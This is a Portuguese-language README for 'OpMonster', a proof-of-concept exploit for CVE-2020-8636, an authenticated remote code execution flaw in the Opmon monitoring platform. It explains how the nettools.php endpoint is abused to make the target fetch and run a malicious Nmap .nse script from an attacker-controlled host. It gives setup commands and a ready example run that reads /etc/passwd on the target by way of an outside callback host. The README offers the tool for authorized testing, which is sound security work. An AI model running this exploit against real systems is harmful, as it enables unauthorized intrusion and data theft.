
Exploit de execução remota de código autenticada para Opmon CVE-2020-8636
Sobre • Instalação • Uso • Licença
O OpMonster é um exploit de prova de conceito para CVE-2020-8636, uma vulnerabilidade de execução remota de código na plataforma de monitoramento Opmon. Ele abusa do endpoint nettools.php, que permite executar o Nmap com opções --script arbitrárias. O exploit faz o Opmon buscar um script .nse malicioso do Nmap em um servidor que você controla (via http-fetch), coloca-o em /tmp e o executa para rodar seu comando no alvo, exibindo a saída.
Descoberto e desenvolvido por @phor3nsic. Mais detalhes: Três CVEs no Opmon.
git clone https://github.com/phor3nsic/opmonster
cd opmonster
pip install requests
Primeiro, inicie um servidor web em um host que o alvo consiga acessar, em um diretório de onde o script .nse gerado possa ser baixado (o exploit grava o script no diretório atual):
php -S 0.0.0.0:1337
Em seguida, execute o exploit com quatro argumentos posicionais:
python3 opmonster.py https://vulnhost.com myhost.ngrok.io 80 "cat /etc/passwd"
| Argumento | Descrição |
|---|---|
HOST | URL base do Opmon de destino (ex.: https://vulnhost.com) |
LHOST | Host do seu servidor que serve o script .nse |
LPORT | Porta do seu servidor |
CMD | Comando a ser executado no alvo |
O exploit aborta com uma mensagem se o alvo não baixar o script ("not vulnerable") ou não conseguir fazer uma conexão de saída para o seu servidor.
Apenas para testes de segurança autorizados e fins educacionais. Você é responsável pelo uso que fizer.